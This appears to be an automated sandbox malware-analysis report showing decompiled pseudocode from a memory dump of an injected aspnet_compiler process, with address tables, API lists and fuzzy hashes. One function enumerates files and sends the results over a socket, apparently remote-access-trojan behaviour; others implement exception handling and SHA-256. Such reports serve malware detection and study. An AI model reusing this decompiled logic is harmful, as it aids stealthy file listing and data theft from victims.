				void* _v656;
				char _v668;
				char _v676;
				void* _v700;
				void* __ebx;
				void* __esi;
				void* __ebp;
				int _t29;
				void* _t34;
				void* _t49;
				void* _t71;
				void* _t74;
				void* _t75;
				void* _t77;

				_t74 = FindFirstFileW(E00401EE4( &_a4),  &_v596);
				_t80 = _t74 - 0xffffffff;
				if(_t74 != 0xffffffff) {
					E004020BF(_t49,  &_v668);
					E0040415E(_t49,  &_v644, _t71, _t75,  &(_v596.cFileName));
					_t72 = 0x4644f0;
					_t29 = E00406E2B(__eflags);
					_t50 = _t29;
					E00401EE9();
					__eflags = _t29;
					if(__eflags != 0) {
						E00401FC2( &_v676, 0x4644f0, _t74, E00402097(_t50,  &_v644, 0x4644f0, 0x250, __eflags,  &_v596, 0x250));
						L5:
						E00401FB8();
					}
					__eflags = FindNextFileW(_t74,  &_v596);
					if(__eflags != 0) {
						_t34 = E00402097(_t50,  &_v620, _t72, 0x250, __eflags,  &_v596, 0x250);
						_t72 =  &_v676;
						E00401FC2( &_v676,  &_v676, _t74, E004087CF(_t50,  &_v652,  &_v676, 0x250, __eflags, _t34));
						E00401FB8();
						goto L5;
					}
					E004020D6(_t50, _t77 - 0x18, _t72, __eflags,  &_v668);
					_push(0x50);
					E00404A81(0x472fc0, _t72, __eflags);
					E00401FB8();
				} else {
					E0041A879(_t49, _t77 - 0x18,  &_a4);
					_push(0x54);
					E00404A81(0x472fc0,  &_a4, _t80);
				}
				return E00401EE9();
			}
























                0x00406ed1
                0x00406ed3
                0x00406ed6
                0x00406efe
                0x00406f0f
                0x00406f14
                0x00406f1b
                0x00406f24
                0x00406f26
                0x00406f30
                0x00406f32
                0x00406f48
                0x00406f88
                0x00406f88
                0x00406f88
                0x00406f99
                0x00406f9b
                0x00406f5d
                0x00406f63
                0x00406f76
                0x00406f7f
                0x00000000
                0x00406f84
                0x00406fa7
                0x00406fac
                0x00406fb3
                0x00406fbc
                0x00406ed8
                0x00406ee4
                0x00406ee9
                0x00406ef0
                0x00406ef0
                0x00406fd6

                APIs
                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ECB
                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406F93
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: FileFind$FirstNextsend
                • String ID:
                • API String ID: 4113138495-0
                • Opcode ID: 96a87b9ec78d820a9482a85bf725c28b27542f83699857228d430aa977a05954
                • Instruction ID: da33ce525bc8868546fe2e6bcae83f091993c6b7fab0c7b7f9de5ed664394571
                • Opcode Fuzzy Hash: 96a87b9ec78d820a9482a85bf725c28b27542f83699857228d430aa977a05954
                • Instruction Fuzzy Hash: F92143311043015BC714FB61DD96DEFB7ACEF90358F400A3EF596621D1EF389A09865A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00451BAB Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODECrypto
                Download Yara Rule
                C-Code - Quality: 100%
                			E00451BAB(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E004521DE(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E00452144(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}























                0x00451bb9
                0x00451bc0
                0x00451bc5
                0x00451bcb
                0x00451bce
                0x00451bd4
                0x00451bd9
                0x00451bde
                0x00451bde
                0x00451be4
                0x00451be9
                0x00451bee
                0x00451bee
                0x00451bf5
                0x00451bfa
                0x00451bff
                0x00451bff
                0x00451c06
                0x00451c0b
                0x00451c10
                0x00451c10
                0x00451c17
                0x00451c1c
                0x00451c21
                0x00451c21
                0x00451c29
                0x00451c39
                0x00451c4b
                0x00451c5d
                0x00451c70
                0x00451c82
                0x00451c8a
                0x00451c8f
                0x00451c94
                0x00451c94
                0x00451c9b
                0x00451ca0
                0x00451ca0
                0x00451ca7
                0x00451cac
                0x00451cac
                0x00451cb3
                0x00451cb8
                0x00451cb8
                0x00451cbf
                0x00451cc4
                0x00451cc4
                0x00451cce
                0x00451cd0
                0x00451d0a
                0x00451cd2
                0x00451cd7
                0x00451cfb
                0x00451d03
                0x00451cf7
                0x00451cf7
                0x00451d0d
                0x00451d14
                0x00451d16
                0x00451d38
                0x00451d40
                0x00451d43
                0x00451d43
                0x00451d45
                0x00451d45
                0x00451d50
                0x00451d56
                0x00451d5b
                0x00451d62
                0x00451d9c
                0x00451da7
                0x00451dad
                0x00451db0
                0x00451db3
                0x00451dbf
                0x00451dc7
                0x00451d64
                0x00451d67
                0x00451d73
                0x00451d79
                0x00451d7f
                0x00451d82
                0x00451d8b
                0x00451d8b
                0x00451dca
                0x00451dd8
                0x00451dde
                0x00451de5
                0x00451de7
                0x00451de7
                0x00451dee
                0x00451df0
                0x00451df0
                0x00451df7
                0x00451df9
                0x00451df9
                0x00451e00
                0x00451e02
                0x00451e02
                0x00451e09
                0x00451e0b
                0x00451e0b
                0x00451e18
                0x00451e1b
                0x00451e52
                0x00451e1d
                0x00451e1d
                0x00451e20
                0x00451e4b
                0x00451e40
                0x00451e40
                0x00451e54
                0x00451e5c
                0x00451e5f
                0x00451e7e
                0x00451e83
                0x00451e83
                0x00451e85
                0x00451e8a
                0x00451e96
                0x00451e8c
                0x00451e8f
                0x00451e8f
                0x00451e9b
                0x00451e9b
                0x00451e61
                0x00451e64
                0x00451e73
                0x00000000
                0x00451e73
                0x00451e66
                0x00451e69
                0x00451e6b
                0x00451e6b
                0x00000000
                0x00451e69
                0x00451e22
                0x00451e25
                0x00451e3b
                0x00000000
                0x00451e3b
                0x00451e2a
                0x00451e2c
                0x00451e2c
                0x00451e2a
                0x00000000
                0x00451e1b
                0x00451d1d
                0x00451d2b
                0x00451d33
                0x00000000
                0x00451d33
                0x00451d21
                0x00451d26
                0x00451d26
                0x00000000
                0x00451d21
                0x00451cde
                0x00451cec
                0x00451cf4
                0x00000000
                0x00451cf4
                0x00451ce2
                0x00451ce7
                0x00451ce7
                0x00451ce2

                APIs
                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00451BA6,?,?,00000008,?,?,00454ADE,00000000), ref: 00451DD8
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ExceptionRaise
                • String ID:
                • API String ID: 3997070919-0
                • Opcode ID: eafd5dcc10c20ccae33b8622cd86151a9c5e622e5bdde7f1896852c197b6d485
                • Instruction ID: ce812bb0dd0712bfabea00db48cb60c78c84c80d6b37c0c35526caaf5cfcecc0
                • Opcode Fuzzy Hash: eafd5dcc10c20ccae33b8622cd86151a9c5e622e5bdde7f1896852c197b6d485
                • Instruction Fuzzy Hash: 45B15B315106089FD715CF28C486B657BE0FF45366F25865AEC9ACF2B2C339E98ACB44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00432251 Relevance: 1.8, Strings: 1, Instructions: 501COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 96%
                			E00432251(void* __ecx, void* __edx) {
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t290;
				unsigned int _t294;
				void* _t296;
				signed int _t298;
				void* _t395;
				void* _t396;
				void* _t397;
				void* _t398;
				void* _t399;
				void* _t400;
				void* _t401;
				void* _t402;
				void* _t403;
				void* _t404;
				void* _t406;
				void* _t407;
				void* _t408;
				void* _t409;
				void* _t410;
				void* _t417;
				void* _t418;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t428;
				void* _t429;
				void* _t430;
				void* _t431;
				void* _t432;
				void* _t439;
				void* _t440;
				void* _t441;
				void* _t442;
				void* _t443;
				signed int _t449;
				void* _t450;
				void* _t451;
				void* _t452;
				void* _t453;
				void* _t454;
				signed int _t460;
				void* _t461;
				void* _t462;
				void* _t463;
				void* _t464;
				void* _t465;
				signed int _t471;
				void* _t472;
				void* _t473;
				void* _t474;
				void* _t475;
				void* _t476;
				signed int _t482;
				void* _t501;
				void* _t508;
				void* _t515;
				void* _t522;
				void* _t529;
				void* _t536;
				void* _t543;
				void* _t550;
				unsigned int _t553;
				signed int _t558;
				signed int _t563;
				signed int _t568;
				signed int _t573;
				signed int _t578;
				signed int _t583;
				signed int _t588;
				signed int _t593;
				unsigned int* _t599;
				signed int _t600;
				void* _t601;
				void* _t602;
				void* _t603;

				_t395 = __edx;
				 *((intOrPtr*)(_t601 + 0x30)) = 0x30;
				_t298 = 8;
				 *((intOrPtr*)(_t601 + 0x14)) = __ecx;
				memcpy(_t601 + 0x34, __ecx, _t298 << 2);
				_t602 = _t601 + 0xc;
				_push(0x10);
				memcpy(_t602 + 0x54, _t395, 0 << 2);
				_t603 = _t602 + 0xc;
				_t599 = _t603 + 0x8c;
				do {
					_t553 =  *_t599;
					_t294 =  *(_t599 - 0x34);
					_t396 = 0x13;
					_t202 = E00432187(_t553, _t396);
					_t397 = 0x11;
					_t203 = E00432187(_t553, _t397);
					_t398 = 0x12;
					_t204 = E00432187(_t294, _t398);
					_t399 = 7;
					_t205 = E00432187(_t294, _t399);
					_t599 =  &(_t599[1]);
					_t12 = _t603 + 0x30;
					 *_t12 =  *(_t603 + 0x30) - 1;
					_t599[1] = (_t202 ^ _t203 ^ _t553 >> 0x0000000a) + (_t204 ^ _t205 ^ _t294 >> 0x00000003) +  *((intOrPtr*)(_t599 - 0x3c)) +  *((intOrPtr*)(_t599 - 0x18));
				} while ( *_t12 != 0);
				 *(_t603 + 0x30) =  *(_t603 + 0x30) & 0x00000000;
				_t558 =  *(_t603 + 0x50);
				_t600 =  *(_t603 + 0x14);
				 *(_t603 + 0x28) =  *(_t603 + 0x40);
				 *(_t603 + 0x1c) =  *(_t603 + 0x4c);
				 *(_t603 + 0x20) =  *(_t603 + 0x3c);
				 *(_t603 + 0x1c) =  *(_t603 + 0x48);
				_t208 =  *(_t603 + 0x48);
				 *(_t603 + 0x28) =  *(_t603 + 0x38);
				_t296 = 2;
				 *(_t603 + 0x10) =  *(_t603 + 0x48);
				 *(_t603 + 0x2c) =  *(_t603 + 0x38);
				do {
					_t400 = 0x19;
					_t209 = E00432187(_t208, _t400);
					_t401 = 0xb;
					_t210 = E00432187( *(_t603 + 0x10), _t401);
					_t402 = 6;
					_t211 = E00432187( *(_t603 + 0x10), _t402);
					_t212 =  *(_t603 + 0x30);
					_t41 = _t212 + 0x46a370; // 0x428a2f98
					_t501 = (_t209 ^ _t210 ^ _t211) + (( *(_t603 + 0x18) ^  *(_t603 + 0x1c)) &  *(_t603 + 0x10) ^  *(_t603 + 0x1c)) +  *_t41 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x58)) + _t558;
					 *(_t603 + 0x2c) =  *(_t603 + 0x2c) + _t501;
					_t403 = 0x16;
					_t213 = E00432187( *(_t603 + 0x2c), _t403);
					_t404 = 0xd;
					_t214 = E00432187( *(_t603 + 0x2c), _t404);
					_t215 = E00432187( *(_t603 + 0x2c), _t296);
					_t563 =  *(_t603 + 0x28);
					 *(_t603 + 0x14) = (( *(_t603 + 0x24) |  *(_t603 + 0x2c)) &  *(_t603 + 0x20) |  *(_t603 + 0x24) &  *(_t603 + 0x2c)) + (_t213 ^ _t214 ^ _t215) + _t501;
					_t406 = 0x19;
					_t218 = E00432187(_t563, _t406);
					_t407 = 0xb;
					_t219 = E00432187(_t563, _t407);
					_t408 = 6;
					_t220 = E00432187(_t563, _t408);
					_t221 =  *(_t603 + 0x30);
					_t59 = _t221 + 0x46a374; // 0x71374491
					_t508 = (_t218 ^ _t219 ^ _t220) + (( *(_t603 + 0x18) ^  *(_t603 + 0x10)) & _t563 ^  *(_t603 + 0x18)) +  *_t59 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x5c)) +  *(_t603 + 0x20);
					 *(_t603 + 0x24) =  *(_t603 + 0x24) + _t508;
					_t409 = 0x16;
					_t222 = E00432187( *(_t603 + 0x14), _t409);
					_t410 = 0xd;
					_t223 = E00432187( *(_t603 + 0x14), _t410);
					_t224 = E00432187( *(_t603 + 0x14), _t296);
					_t568 =  *(_t603 + 0x20);
					 *(_t603 + 0x20) = (( *(_t603 + 0x2c) |  *(_t603 + 0x14)) &  *(_t603 + 0x24) |  *(_t603 + 0x2c) &  *(_t603 + 0x14)) + (_t222 ^ _t223 ^ _t224) + _t508;
					_t417 = 0x19;
					_t227 = E00432187(_t568, _t417);
					_t418 = 0xb;
					_t228 = E00432187(_t568, _t418);
					_t419 = 6;
					_t229 = E00432187(_t568, _t419);
					_t230 =  *(_t603 + 0x30);
					_t78 = _t230 + 0x46a378; // 0xb5c0fbcf
					_t515 = (_t227 ^ _t228 ^ _t229) + (( *(_t603 + 0x28) ^  *(_t603 + 0x10)) & _t568 ^  *(_t603 + 0x10)) +  *_t78 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x60)) +  *(_t603 + 0x1c);
					 *(_t603 + 0x28) =  *(_t603 + 0x28) + _t515;
					_t420 = 0x16;
					_t231 = E00432187( *(_t603 + 0x1c), _t420);
					_t421 = 0xd;
					_t232 = E00432187( *(_t603 + 0x1c), _t421);
					_t233 = E00432187( *(_t603 + 0x1c), _t296);
					_t573 =  *(_t603 + 0x24);
					 *(_t603 + 0x1c) = (( *(_t603 + 0x14) |  *(_t603 + 0x1c)) &  *(_t603 + 0x2c) |  *(_t603 + 0x14) &  *(_t603 + 0x1c)) + (_t231 ^ _t232 ^ _t233) + _t515;
					_t428 = 0x19;
					_t236 = E00432187(_t573, _t428);
					_t429 = 0xb;
					_t237 = E00432187(_t573, _t429);
					_t430 = 6;
					_t238 = E00432187(_t573, _t430);
					_t239 =  *(_t603 + 0x30);
					_t97 = _t239 + 0x46a37c; // 0xe9b5dba5
					_t522 = (_t236 ^ _t237 ^ _t238) + (( *(_t603 + 0x20) ^  *(_t603 + 0x28)) & _t573 ^  *(_t603 + 0x28)) +  *_t97 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x64)) +  *(_t603 + 0x14);
					 *(_t603 + 0x30) =  *(_t603 + 0x30) + _t522;
					_t431 = 0x16;
					_t240 = E00432187( *(_t603 + 0x18), _t431);
					_t432 = 0xd;
					_t241 = E00432187( *(_t603 + 0x18), _t432);
					_t242 = E00432187( *(_t603 + 0x18), _t296);
					_t578 =  *(_t603 + 0x2c);
					 *(_t603 + 0x14) = (( *(_t603 + 0x18) |  *(_t603 + 0x1c)) &  *(_t603 + 0x14) |  *(_t603 + 0x18) &  *(_t603 + 0x1c)) + (_t240 ^ _t241 ^ _t242) + _t522;
					_t439 = 0x19;
					_t245 = E00432187(_t578, _t439);
					_t440 = 0xb;
					_t246 = E00432187(_t578, _t440);
					_t441 = 6;
					_t247 = E00432187(_t578, _t441);
					_t248 =  *(_t603 + 0x30);
					_t116 = _t248 + 0x46a380; // 0x3956c25b
					_t529 = (_t245 ^ _t246 ^ _t247) + (( *(_t603 + 0x20) ^  *(_t603 + 0x24)) & _t578 ^  *(_t603 + 0x20)) +  *_t116 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x68)) +  *(_t603 + 0x2c);
					_t250 =  *(_t603 + 0x18) + _t529;
					_t442 = 0x16;
					 *(_t603 + 0x14) = _t250;
					 *(_t603 + 0x50) = _t250;
					_t251 = E00432187( *(_t603 + 0x10), _t442);
					_t443 = 0xd;
					_t252 = E00432187( *(_t603 + 0x10), _t443);
					_t449 = (( *(_t603 + 0x18) |  *(_t603 + 0x10)) &  *(_t603 + 0x1c) |  *(_t603 + 0x18) &  *(_t603 + 0x10)) + (_t251 ^ _t252 ^ E00432187( *(_t603 + 0x10), _t296)) + _t529;
					_t583 =  *(_t603 + 0x14);
					 *(_t603 + 0x2c) = _t449;
					 *(_t603 + 0x44) = _t449;
					_t450 = 0x19;
					_t256 = E00432187(_t583, _t450);
					_t451 = 0xb;
					_t257 = E00432187(_t583, _t451);
					_t452 = 6;
					_t258 = E00432187(_t583, _t452);
					_t259 =  *(_t603 + 0x30);
					_t137 = _t259 + 0x46a384; // 0x59f111f1
					_t536 = (_t256 ^ _t257 ^ _t258) + (( *(_t603 + 0x24) ^  *(_t603 + 0x2c)) & _t583 ^  *(_t603 + 0x24)) +  *_t137 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x6c)) +  *(_t603 + 0x24);
					_t261 =  *(_t603 + 0x20) + _t536;
					_t453 = 0x16;
					 *(_t603 + 0x1c) = _t261;
					 *(_t603 + 0x4c) = _t261;
					_t262 = E00432187( *(_t603 + 0x28), _t453);
					_t454 = 0xd;
					_t263 = E00432187( *(_t603 + 0x28), _t454);
					_t460 = (( *(_t603 + 0x28) |  *(_t603 + 0x10)) &  *(_t603 + 0x18) |  *(_t603 + 0x28) &  *(_t603 + 0x10)) + (_t262 ^ _t263 ^ E00432187( *(_t603 + 0x28), _t296)) + _t536;
					_t588 =  *(_t603 + 0x1c);
					 *(_t603 + 0x24) = _t460;
					 *(_t603 + 0x40) = _t460;
					_t461 = 0x19;
					_t267 = E00432187(_t588, _t461);
					_t462 = 0xb;
					_t268 = E00432187(_t588, _t462);
					_t463 = 6;
					_t269 = E00432187(_t588, _t463);
					_t157 =  *(_t603 + 0x30) + 0x46a388; // 0x923f82a4
					_t543 = (_t267 ^ _t268 ^ _t269) + (( *(_t603 + 0x2c) ^  *(_t603 + 0x14)) & _t588 ^  *(_t603 + 0x2c)) +  *_t157 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x6c)) +  *(_t603 + 0x24);
					_t272 =  *(_t603 + 0x18) + _t543;
					_t464 = 0x16;
					 *(_t603 + 0x18) = _t272;
					 *(_t603 + 0x48) = _t272;
					_t273 = E00432187( *(_t603 + 0x20), _t464);
					_t465 = 0xd;
					_t274 = E00432187( *(_t603 + 0x20), _t465);
					_t471 = (( *(_t603 + 0x20) |  *(_t603 + 0x28)) &  *(_t603 + 0x10) |  *(_t603 + 0x20) &  *(_t603 + 0x28)) + (_t273 ^ _t274 ^ E00432187( *(_t603 + 0x20), _t296)) + _t543;
					_t593 =  *(_t603 + 0x18);
					 *(_t603 + 0x28) = _t471;
					 *(_t603 + 0x3c) = _t471;
					_t472 = 0x19;
					_t278 = E00432187(_t593, _t472);
					_t473 = 0xb;
					_t279 = E00432187(_t593, _t473);
					_t474 = 6;
					_t280 = E00432187(_t593, _t474);
					_t281 =  *(_t603 + 0x30);
					_t179 = _t281 + 0x46a38c; // 0xab1c5ed5
					_t550 = (_t278 ^ _t279 ^ _t280) + (( *(_t603 + 0x14) ^  *(_t603 + 0x1c)) & _t593 ^  *(_t603 + 0x14)) +  *_t179 +  *((intOrPtr*)(_t603 +  *(_t603 + 0x30) + 0x74)) +  *(_t603 + 0x30);
					_t283 =  *(_t603 + 0x14) + _t550;
					_t475 = 0x16;
					 *(_t603 + 0x10) = _t283;
					 *(_t603 + 0x44) = _t283;
					_t284 = E00432187( *(_t603 + 0x24), _t475);
					_t476 = 0xd;
					_t285 = E00432187( *(_t603 + 0x24), _t476);
					_t482 = (( *(_t603 + 0x20) |  *(_t603 + 0x24)) &  *(_t603 + 0x28) |  *(_t603 + 0x20) &  *(_t603 + 0x24)) + (_t284 ^ _t285 ^ E00432187( *(_t603 + 0x24), _t296)) + _t550;
					_t558 =  *(_t603 + 0x14);
					_t290 =  *(_t603 + 0x30) + 0x20;
					 *(_t603 + 0x30) = _t290;
					_t208 =  *(_t603 + 0x10);
					 *(_t603 + 0x2c) = _t482;
					 *(_t603 + 0x34) = _t482;
				} while (_t290 < 0x100);
				do {
					asm("movups xmm0, [ebp]");
					asm("movups xmm1, [eax+ebp]");
					asm("paddd xmm1, xmm0");
					asm("movups [ebp], xmm1");
					_t600 = _t600 + 0x10;
					_t296 = _t296 - 1;
				} while (_t296 != 0);
				return 0;
			}


































































































































                0x00432251
                0x0043225d
                0x00432267
                0x0043226a
                0x00432272
                0x00432272
                0x00432274
                0x0043227d
                0x0043227d
                0x0043227f
                0x00432286
                0x00432286
                0x0043228b
                0x00432290
                0x00432291
                0x00432298
                0x0043229d
                0x004322a9
                0x004322ae
                0x004322b5
                0x004322ba
                0x004322c6
                0x004322d1
                0x004322d1
                0x004322d6
                0x004322d6
                0x004322e3
                0x004322e8
                0x004322ec
                0x004322f0
                0x004322f8
                0x00432300
                0x0043230a
                0x0043230e
                0x00432312
                0x0043231a
                0x0043231b
                0x0043231f
                0x00432323
                0x00432325
                0x00432328
                0x00432335
                0x00432336
                0x00432343
                0x00432344
                0x00432357
                0x00432367
                0x00432371
                0x00432373
                0x00432377
                0x00432378
                0x00432385
                0x00432386
                0x00432393
                0x004323b2
                0x004323b6
                0x004323be
                0x004323bf
                0x004323c6
                0x004323cb
                0x004323d2
                0x004323d7
                0x004323e6
                0x004323f8
                0x00432402
                0x00432406
                0x0043240a
                0x0043240b
                0x00432414
                0x00432419
                0x00432426
                0x00432445
                0x0043244b
                0x00432451
                0x00432452
                0x00432459
                0x0043245e
                0x00432465
                0x0043246a
                0x00432479
                0x0043248b
                0x00432495
                0x00432499
                0x0043249d
                0x0043249e
                0x004324ab
                0x004324ac
                0x004324b9
                0x004324d8
                0x004324de
                0x004324e4
                0x004324e5
                0x004324ec
                0x004324f1
                0x004324f8
                0x004324fd
                0x0043250c
                0x0043251e
                0x00432528
                0x0043252c
                0x00432530
                0x00432531
                0x0043253e
                0x0043253f
                0x0043254c
                0x0043256b
                0x00432571
                0x00432577
                0x00432578
                0x0043257f
                0x00432584
                0x0043258b
                0x00432590
                0x0043259f
                0x004325b1
                0x004325bf
                0x004325c3
                0x004325c5
                0x004325c6
                0x004325ca
                0x004325ce
                0x004325db
                0x004325dc
                0x00432606
                0x00432608
                0x0043260e
                0x00432614
                0x00432618
                0x00432619
                0x00432620
                0x00432625
                0x0043262c
                0x00432631
                0x00432640
                0x00432652
                0x00432660
                0x00432664
                0x00432666
                0x00432667
                0x0043266b
                0x0043266f
                0x0043267c
                0x0043267d
                0x004326a7
                0x004326a9
                0x004326af
                0x004326b5
                0x004326b9
                0x004326ba
                0x004326c1
                0x004326c6
                0x004326cd
                0x004326d2
                0x004326ed
                0x004326fb
                0x00432703
                0x00432707
                0x00432708
                0x0043270c
                0x00432710
                0x0043271d
                0x0043271e
                0x00432748
                0x0043274a
                0x00432750
                0x00432756
                0x0043275a
                0x0043275b
                0x00432762
